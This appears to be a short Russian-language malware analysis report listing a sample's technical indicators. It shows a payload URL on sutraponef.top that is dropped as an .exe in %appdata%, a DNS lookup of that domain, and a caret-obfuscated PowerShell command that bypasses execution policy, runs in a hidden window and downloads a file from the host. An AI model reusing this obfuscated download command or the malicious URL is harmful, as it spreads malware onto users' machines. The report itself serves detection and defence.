Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oWERsH^e^ll.EX^e ^-^E^XeC^U^Ti^O^NPOl^i^Cy ^bYPA^S^S^ ^-nOProFILE^ ^-winDOwstYlE HIDde^n ^(n^EW^-o^bject ^sY^st^e^m.N^E^T.W^E^bcL^iEnt).do^wN^loa^d^fIlE('http://sutraponef....
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "p^oWERsH^e^ll.EX^e ^-^E^XeC^U^Ti^O^NPOl^i^Cy ^bYPA^S^S^ ^-nOProFILE^ ^-winDOwstYlE HIDde^n ^(n^EW^-o^bject ^sY^st^e^m.N^E^T.W^E^bcL^iEnt).do^wN^loa^d^fIlE('http://sutraponef....' (со скрытым окном)